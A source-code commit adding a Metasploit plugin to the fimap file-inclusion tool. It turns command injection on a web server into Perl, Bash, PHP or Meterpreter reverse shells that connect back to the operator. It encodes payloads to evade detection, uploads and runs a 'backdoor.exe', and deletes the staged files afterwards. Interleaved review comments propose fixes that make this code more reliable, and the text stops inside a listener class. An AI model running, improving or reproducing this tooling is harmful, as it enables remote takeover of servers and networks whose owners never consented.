Commit 6e177866 authored by fimap.dev's avatar fimap.dev

Added Xavier Garcia's metasploit binding exploit-plugin!

parent f729559f
These are the trusted plugins which are downloadable.
Introduction
------------
This plugin is taking advantage of the Pymetasploit Python module
to run Metasploit payloads in the target machine and gain further
access to the server and network.
Features
--------
This plugin uses Metasploit payloads for Unix and Windows boxes by using
system calls provided by Fimap. It also creates listeners in your running
msfconsole by using the XMLRPC interface.
Unix payloads:
- Perl Reverse shell
Creates another process executing a Perl onliner that will connect back
to your box.
- Bash reverse shell
/dev/tcp trick to connect back to the attacker machine.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution.
- PHP reverse shell
A PHP script will be executed in the context of the web server. This script
will connect back to the attacker machine and spawn a shell.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution.
Windows payloads:
- Meterpreter reverse shell
This payload uploads a Meterpreter binary encoded in Windows debug format and
executes it in the target machine.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution. It can be fixed
by migrating the Meterpreter payload to another process once you have a session
in your msfconsole. At this point the plugin will clean the temporary files.
Using this module
------------------
It will automatically detect if the target machine is a Windows or Unix box and
will show you the available payloads for the given platform.
Once you have selected your payload, it will ask you for the LHOST and LPORT
variables that will be used to create the selected Metasploit payload.
The last step is provide the password used when loading the XMLRPC interface in
msfconsole. One important restriction is that msfconsole must be listening in
localhost and the standard port.
This is the right way to setup msfconsole to listen for XMLRPC requests where
abc123 is your password.
msf > load xmlrpc Pass=abc123 ServerType=Web
At this point, your payload will be executed and it will connect back to your msfconsole.
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugininterface import basePlugin
from plugins.msf.pymetasploit.MetasploitWrapper import *
from plugins.msf.pymetasploit.MetasploitXmlRpcListener import *
import getpass, tempfile, os
class msf(basePlugin):
isShellCode=False
lhost=""
lport=""
def plugin_init(self):
pass
def plugin_loaded(self):
pass
def plugin_exploit_modes_requested(self, langClass, isSystem, isUnix):
# This method will be called just befor the user gets the 'available attack' screen.
# You can see that we get the
# * langClass (which represents the current language of the script)
# * A boolean value 'isSystem' which tells us if we can inject system commands.
# * And another boolean 'isUnix' which will be true if it's a unix-like system and false if it's Windows.
# We should return a array which contains tuples with a label and a unique callback string.
ret = []
#print "Language: " + langClass.getName()
if (isSystem):
attack = ("Executes MSF reverse payloads", "msf.reverse_tcp")
ret.append(attack)
return(ret)
def msf_menu_unix(self,msfObj,lhost,lport,haxhelper):
print "Available payloads:"
print "1) Perl reverse tcp"
print "2) Bash reverse tcp"
print "3) PHP reverse tcp"
result=raw_input("Choose your payload: ")
if int(result) == 1:
self.isShellCode=True
msfObj.linuxPerlReverseShell(lhost,lport)
msfObj.createPayload()
return True
elif int(result) == 2:
self.isShellCode=True
msfObj.linuxBashReverseShell(lhost,lport)
msfObj.createPayload()
print "Warning: Fimap will hang and crash because this Bash payload will run in foreground"
return True
elif int(result)==3:
self.isShellCode=False
if haxhelper.getLangName() =="php":
isShellCode=False
msfObj.phpReverseShell(lhost,lport)
msfObj.createPayload()
msfObj.loadCustomPayload("<?php\n"+msfObj.getPayload()+"\n?>")
print "Warning: Fimap will hang and crash because this PHP payload will run in foreground"
return True
else:
return False
else:
self.msf_menu_unix(msfobj,lhost,lport,haxhelper)
def get_parameters(self):
self.lhost=raw_input("Please, introduce lhost: ")
self.lhost=self.lhost.strip("\n")
self.lport=raw_input("Please, introduce lport: ")
self.lport=self.lport.strip("\n")
self.password=getpass.getpass("Please, introduce the password for msfconsole: ")
def set_listener(self,payload):
Listener=MsfXmlRpcListener()
Listener.setPassword(self.password)
Listener.setLhost(self.lhost)
Listener.setLport(self.lport)
Listener.setPayload(payload)
print "Creating listener... "
try:
Listener.login()
Listener.launchHandler()
print "Listener created: PAYLOAD:%s LHOST:%s LPORT:%s " % (Listener.getPayload(),Listener.getLhost(),Listener.getLport())
except MsfXmlRpcListenerErr,err:
print err
def plugin_callback_handler(self, callbackstring, haxhelper):
# This function will be launched if the user selected one of your attacks.
# The two params you receive here are:
# * callbackstring - The string you have defined in plugin_exploit_modes_requested.
# * haxhelper - A little class which makes it very easy to send an injected command.
if (callbackstring == "msf.reverse_tcp"):
if (haxhelper.isUnix()):
# We are in unix
msfObj=MsfWrapper()
self.get_parameters()
if not self.msf_menu_unix(msfObj,self.lhost,self.lport,haxhelper):
print "Sorry, this is payload not supported in this architecture!"
return 0
self.set_listener("cmd/unix/reverse_netcat")
print "Executing your payload ... "
if self.isShellCode:
haxhelper.executeSystemCommand(msfObj.getPayload())
else: haxhelper.executeCode(msfObj.getPayload())
else:
self.get_parameters()
msfObj=MsfWrapper()
msfObj.winMeterpreterReverseTcp(self.lhost,self.lport)
msfObj.createPayload()
msfObj.encodeWinDebug()
fd, tmpPayload = tempfile.mkstemp(prefix="pymetasploit")
os.close(fd)
fd=open(tmpPayload,'w')
fd.write(msfObj.getPayload())
fd.close()
tmpDir=haxhelper.executeSystemCommand("echo %TEMP%")
haxhelper.executeSystemCommand(haxhelper.concatCommands(("cd "+tmpDir, " > T")))
dest = tmpDir+"\\backdoor.bat"
bytes = haxhelper.uploadfile(tmpPayload, dest, -1)
os.remove(tmpPayload)
print "%d bytes written to '%s'." %(bytes, dest)
self.set_listener("windows/meterpreter/reverse_tcp")
print "Launching now..."
command = haxhelper.concatCommands(("cd "+tmpDir, dest))
haxhelper.executeSystemCommand(command)
haxhelper.executeSystemCommand(tmpDir+"\\backdoor.exe")
haxhelper.executeSystemCommand("del "+tmpDir+"\\backdoor.exe")
haxhelper.executeSystemCommand("del "+tmpDir+"\\backdoor.bat")
haxhelper.executeSystemCommand("del "+tmpDir+"\\T")
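Review bot: The final `else` of `msf_menu_unix` calls `self.msf_menu_unix(msfobj,lhost,lport,haxhelper)`, but `msfobj` is not defined in that scope (the parameter is `msfObj`), so an out-of-range menu choice raises NameError. The recursive result is also not returned, so even with the name fixed the caller would receive `None` and print the "not supported" message; `return self.msf_menu_unix(msfObj,lhost,lport,haxhelper)` fixes both. Non-numeric input raises ValueError from `int(result)`, so the choice should be parsed once inside a `try`/`except ValueError`. The bare `isShellCode=False` in the PHP branch only binds a local and can be dropped. In the Windows branch of `plugin_callback_handler`, `os.remove(tmpPayload)` is skipped if `haxhelper.uploadfile` raises, which leaves the generated file in the operator's temp directory; a `try`/`finally` around the upload would cover that.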
<?xml version="1.0" encoding="UTF-8"?>
<plugin
name="msf_bindings"
startup="msf"
version="1"
autor="Xavier Garcia"
email="xavi.garcia@gmail.com"
url="http://fimap.googlecode.com"
/>
\ No newline at end of file
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# Copyright (c) 2009, Fast-Track
# The function toWinDebug() is an adapted version of the script
# bin/ftsrc/binarypayloadgen.py from Fast-Track 4.0
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from subprocess import *
import re,binascii,os,sys,time,tempfile
from sys import exit, stdout
class MsfEncodeExecErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfEncode(object):
msfObj=None
def __init__(self,msfObj):
self.msfObj=msfObj
def toBase64(self):
self.msfObj.setPayload(base64.b64encode(self.msfObj.getPayload()))
#encodes the payload using Xor and a key
def toXor(self,key):
kIdx = 0
cryptStr = "" # empty 'crypted string to be returned
# loop through the string and XOR each byte with the keyword
# to get the 'crypted byte. Add the 'crypted byte to the
# 'crypted string
for x in range(len(self.msfObj.getPayload())):
cryptStr = cryptStr + \
chr( ord(self.msfObj.getPayload()[x]) ^ ord(key[kIdx]))
# use the mod operator - % - to cyclically loop through
# the keyword
kIdx = (kIdx + 1) % len(key)
self.msfObj.setPayload(cryptStr)
def toHex(self):
self.msfObj.setPayload(binascii.hexlify(self.msfObj.getPayload()))
def toShikataGaNai(self,times,arch):
#msfencode -c 10 -a x86 -t exe -e x86/shikata_ga_nai
msfencode=['msfencode','-c',str(times),'-a',str(arch),'-t','exe','-e','x86/shikata_ga_nai']
process=Popen(msfencode,stdout=PIPE,stderr=PIPE,stdin=PIPE)
stdOut, stdErr=process.communicate(self.msfObj.getPayload())
msfEncodeNoEncSucceed="No encoders succeeded"
if re.search(msfEncodeNoEncSucceed,stdOut,re.MULTILINE)!=None:
raise MsfEncodeExecErr("Error trying to generate payload: "+self.msfObj.getRequestedPayload()+" "+' '.join(self.msfObj.getParams()))
self.msfObj.setPayload(stdOut)
# returns a shell script that sends a binary to stdout when executed
# ./mysh.sh > backdoor
def toBash(self):
self.toHex()
bashPayload="#! /bin/bash\n\n"
bashPayload=bashPayload+"PAYLOAD=\"%s\"\n" % (self.msfObj.getPayload())
bashPayload=bashPayload+"echo -n -e $( echo $PAYLOAD|tr -d '[:space:]' | sed 's/../\\\\x&/g') > /tmp/uploaded"
self.msfObj.setPayload(bashPayload)
def toWinDebug(self):
try:
import psyco
psyco.full()
except ImportError:
pass
throwerror=300
filesize = lambda x,n: stdout.write(x+'\n') or throwerror#(n)#exit(n)
try:
fd, tmpPayload = tempfile.mkstemp(prefix="pymetasploit")
os.close(fd)
fd=open(tmpPayload,'wb')
fd.write(self.msfObj.getPayload())
fd.close()
fdout, temp_path = tempfile.mkstemp(prefix="pymetasploit")
os.close(fdout)
fileopen,writefile = open(tmpPayload,'rb'),open(temp_path, 'w')
except:
print "Something went wrong...."
FOOTER = ''.join(map(lambda x:"echo "+x+">>T\n",
["RCX","%X ","N T.BIN","WDS:0","Q"]))
FOOTER += 'DEBUG<T 1>NUL\n'
FOOTER += 'MOVE T.BIN backdoor.exe'
FC,CX = 0, fileopen.seek(0,2) or fileopen.tell()
if (CX > 0xFFFF):
fileopen.close(); writefile.close()
filesize('[!] filesize exceeds 64kb, quitting.',1);
fileopen.seek(0,0)
writefile.write('DEL T 1>NUL 2>NUL\n')
try:
for chunk in xrange(0x1000):
finalwrite = fileopen.read(16) or writefile.write(FOOTER%CX) or filesize("",0)
if finalwrite.count('\0')==0x10: FC += 1
else:
if FC > 0:
writefile.write('echo FDS:%X L %X 00>>T\n'%((chunk-FC)*0x10,FC*0x10))
FC = 0
writefile.write('echo EDS:%X '%(chunk*0x10))
writefile.write(' '.join(map(lambda x:"%02X"%ord(x),finalwrite))+'>>T\n')
except Exception:
pass
writefile.close()
fd=open(temp_path,'r')
self.msfObj.setPayload(fd.read())
fd.close()
os.remove(temp_path)
os.remove(tmpPayload)
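Review bot: The error paths in `toWinDebug` do not stop the function. The bare `except:` around the temp-file setup only prints "Something went wrong....", after which `fileopen` and `writefile` may be unbound, and the `CX > 0xFFFF` branch closes both files and then falls through to `fileopen.seek(0,0)` on a closed file. Both places should raise instead, for example `raise MsfEncodeExecErr("payload exceeds 64kb")`, with the two `os.remove` calls moved into a `finally` so the staged files are not left behind on failure. The later `except Exception: pass` appears to be what ends the read loop at EOF, so it also hides genuine I/O errors; an explicit `break` on an empty read would be clearer. Separately, `toBase64` calls `base64.b64encode`, but the import line `import re,binascii,os,sys,time,tempfile` does not include `base64`.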
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class MsfObj(object):
requestedPayload=""
params=[]
payload=""
mode=""
def __init__(self):
pass
def getRequestedPayload(self):
return self.requestedPayload
def getParams(self):
return self.params
def getPayload(self):
return self.payload
def getMode(self):
return self.mode
def setRequestedPayload(self,payload):
self.requestedPayload=payload
def setParams(self,params):
self.params=params
def setPayload(self,payload):
self.payload=payload
def setMode(self,mode):
self.mode=mode
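Review bot: `params=[]` is declared at class level in `MsfObj`, so every instance that has not yet called `setParams` shares one list object, and a caller that mutates the result of `getParams()` in place would change it for all of them. Initialising the four fields in `__init__` (`self.params=[]` and so on) instead of leaving `__init__` as `pass` avoids that. The class also lacks a docstring; one line stating that it carries the requested payload name, its parameter list, the output mode and the generated payload would help readers of the modules that import it.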
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from subprocess import *
import re
class MsfPayloadExecErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfPayload(object):
msfObj=None
def __init__(self,msfObj):
self.msfObj=msfObj
def msfLoadPayload(self):
# we have to execute something like this:
# msfpayload php/reverse_php LPORT=8080 LHOST=127.0.0.1 R
#Error handling
# Unfortunately msfpayload does not return error messages to the parent
# process. It send a error string to stdout and ends the execution.
# ERROR MSGS sent msfpayload to stdout
# Error generating payload:
# Invalid payload:
# Framework Payloads (XYZ total)
errGenPayloadPattern="^Error generating payload:"
invalidPayloadPattern="^Invalid payload:"
msfPayloadHelpPattern="Framework Payloads \(\d{1,} total\)"
msfpayload=['msfpayload']
msfpayload.append(self.msfObj.getRequestedPayload())
msfpayload.extend(self.msfObj.getParams())
msfpayload.append(self.msfObj.getMode())
process=Popen(msfpayload,stdout=PIPE,stderr=PIPE,stdin=None)
stdOut, stdErr=process.communicate()
# We have cached and error from MsfPayload :)
if re.search(errGenPayloadPattern,stdOut,re.MULTILINE)!=None or \
re.search(invalidPayloadPattern,stdOut,re.MULTILINE)!=None or \
re.search(msfPayloadHelpPattern,stdOut,re.MULTILINE)!=None:
raise MsfPayloadExecErr("Error trying to generate payload: "+self.msfObj.getRequestedPayload()+" "+' '.join(self.msfObj.getParams()))
self.msfObj.setPayload(stdOut)
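Review bot: `msfLoadPayload` captures `stdErr` and then drops it, and never looks at `process.returncode`, so success is decided only by the three patterns searched in `stdOut`. The comment explains that msfpayload reports errors on stdout, so the pattern test has to stay, but adding `or process.returncode != 0` to the condition and appending `stdErr` to the `MsfPayloadExecErr` message would catch failures that print something else. `Popen` can also raise `OSError` when the `msfpayload` binary is not found, which callers catching `MsfPayloadExecErr` will not handle. The third pattern relies on unrecognised string escapes and should be a raw string, `r"Framework Payloads \(\d{1,} total\)"`.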
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from plugins.msf.pymetasploit.MetasploitPayload import MsfPayload
from plugins.msf.pymetasploit.MetasploitEncode import MsfEncode
class MsfWrapper(object):
msfObj=None
def __init__(self):
self.msfObj=MsfObj()
def phpReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("php/reverse_php")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def phpBindShell(self,rhost,lport):
self.msfObj.setRequestedPayload("php/reverse_php")
self.msfObj.setParams(["RHOST="+rhost,"LPORT="+lport])
self.msfObj.setMode("R")
def winMeterpreterReverseTcp(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/meterpreter/reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("X")
def winMeterpreterReverseTcpRaw(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/meterpreter/reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def linuxBindShell(self,lport):
self.msfObj.setRequestedPayload("linux/x86/shell_bind_tcp")
self.msfObj.setParams(["LPORT="+lport])
self.msfObj.setMode("X")
def linuxPerlReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("cmd/unix/reverse_perl")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def linuxBashReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("cmd/unix/reverse_bash")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def winShellReverseTcp(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/shell_reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("X")
def createPayload(self):
msfP=MsfPayload(self.msfObj)
msfP.msfLoadPayload()
def encodeBase64(self):
msfE=MsfEncode(self.msfObj)
msfE.toBase64()
def encodeXor(self,key):
msfE=MsfEncode(self.msfObj)
msfE.toXor(key)
def encodeHex(self):
msfE=MsfEncode(self.msfObj)
msfE.toHex()
def encodeShikataGaNai(self,times=1,arch="x86"):
msfE=MsfEncode(self.msfObj)
msfE.toShikataGaNai(times,arch)
def encodeWinDebug(self):
msfE=MsfEncode(self.msfObj)
msfE.toWinDebug()
def encodeBash(self):
msfE=MsfEncode(self.msfObj)
msfE.toBash()
def getPayload(self):
return self.msfObj.getPayload()
def loadCustomPayload(self,payload):
self.msfObj.setPayload(payload)
def loadCustomPayloadFromFile(self,file):
msfObj=MsfWrapper()
fd=open(file,'rb')
payload=fd.read()
fd.close()
self.loadCustomPayload(payload)
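Review bot: `loadCustomPayloadFromFile` builds `msfObj=MsfWrapper()` and never uses it, so each call constructs a throwaway wrapper and `MsfObj`. The file handle is not closed if `fd.read()` raises, and the parameter name `file` shadows the builtin. I would drop the unused line and read with `with open(file,'rb') as fd: payload=fd.read()`. `phpBindShell` sets the same requested payload string as `phpReverseShell` while passing `RHOST`, which looks like a copy-paste slip worth confirming.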
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import xmlrpclib
import socket
import sys
import time
class MsfXmlRpcListenerErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfXmlRpcListener:
payload="cmd/unix/reverse_netcat"
lport="8080"
lhost="127.0.0.1"
user="msf"
password=""
connection=""
token=""
def __init__(self):
pass
def setPassword(self,passwd):
self.password=passwd